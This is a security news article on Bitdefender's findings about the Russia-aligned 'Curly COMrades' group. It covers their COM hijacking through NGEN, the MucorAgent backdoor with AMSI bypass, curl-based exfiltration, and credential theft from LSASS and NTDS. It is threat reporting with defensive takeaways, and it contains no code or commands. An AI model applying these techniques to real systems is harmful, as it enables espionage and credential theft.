Russia-Aligned ‘Curly COMrades’ Hackers Deploy Stealthy COM Hijack to Burrow into Government and Energy Networks

A newly identified cyber-espionage group, dubbed Curly COMrades, has been quietly infiltrating critical government and energy networks in Eastern Europe using a rare persistence trick hidden in plain sight.

Researchers at Bitdefender Labs say the group—believed to operate in alignment with Russian geopolitical interests—has been active since at least mid-2024, targeting judicial and government bodies in Georgia and an energy distributor in Moldova. Their aim: embed themselves deep inside networks for the long haul, harvest credentials, and exfiltrate sensitive data with as little noise as possible.

An Unorthodox Foothold: COM Hijacking Meets NGEN

While most espionage crews lean on tried-and-true persistence methods, Curly COMrades introduced a twist: hijacking Component Object Model (COM) handlers linked to Microsoft’s Native Image Generator (NGEN). This normally dormant .NET optimization service is periodically—and unpredictably—reactivated by Windows, allowing the malware to resurface without triggering conventional startup alarms.

“This is persistence that can survive reboots, updates, and potentially security scans,” said James McQuiggan, Security Awareness Advocate at KnowBe4. “By encrypting their commands and abusing Windows features such as COM objects, attackers are creating persistence that can survive reboots, updates, and potentially security scans.”

The hijack loads a custom backdoor, MucorAgent—a three-stage, AES-encrypted, PowerShell-driven implant capable of executing scripts invisibly, patching AMSI to bypass antivirus inspection, and exfiltrating results disguised as PNG image files via curl.exe.

Infrastructure Disguised as Everyday Web Traffic

Bitdefender’s analysis shows the group relying heavily on proxy tooling—Resocks, SOCKS5 servers, SSH with Stunnel—to build redundant entry points. Many of these connections route through compromised but legitimate websites, masking C2 traffic inside what appears to be ordinary browsing activity.

“The heavy use of curl.exe for C2 traffic and exfiltration demonstrates a living-off-the-land approach,” said Ensar Seker, CISO at SOCRadar. “They’re blending into normal administrative activity, making detection much harder.”

Evidence suggests the group maintains a broad network of hijacked web servers to bounce traffic, further complicating attribution and allowing them to bypass geo-blocking rules.

Credential Harvesting at Scale

Once inside, Curly COMrades show an obsession with credential theft. Investigators observed repeated NTDS database extractions from domain controllers and LSASS memory dumps to recover password hashes or even plaintext credentials. The group rotated through well-known tooling—Mimikatz, procdump, DCSync—as well as custom builds derived from open-source projects like TrickDump.

The overlap in encryption techniques between these tools and MucorAgent suggests shared development resources or at least a common toolkit philosophy.

Low-Noise Data Theft

Exfiltration is sparse and manual—archives are staged in public folders, compressed with WinRAR, and pushed to attacker-controlled infrastructure via curl. That measured pace likely keeps intrusion detection systems from flagging abnormal spikes in outbound data.

According to Seker, the campaign “is not a smash-and-grab operation; it’s patient, persistent espionage” aimed at high-value targets where stealth outweighs speed.

Why the Name?

Bitdefender’s decision to christen the crew Curly COMrades breaks from the industry trend of giving APTs sleek or myth-inspired monikers. The name references both their reliance on curl.exe and their COM object hijacking, but it’s also meant to strip away any mystique.

“They are not ‘fancy bears’ or ‘wizard spiders,’” the researchers wrote. “They are simply malicious actors engaged in disruptive and harmful behavior.”

Defensive Takeaways

Analysts recommend stepped-up behavioral monitoring to detect COM object changes, irregular PowerShell activity, and unexpected curl.exe traffic patterns. Restricting the use of administrative tools and auditing scheduled tasks for inactive or odd-looking entries could surface persistence before it triggers.

McQuiggan warns that waiting for an alert isn’t enough: “Threat hunting is critical for detecting these types of attacks. If organizations are waiting for an alert, they are already losing the battle.”

For governments and critical infrastructure operators, the lesson is stark—Curly COMrades have shown that by creatively combining old techniques with uncommon persistence hooks, a patient adversary can all but disappear into the noise of daily network activity.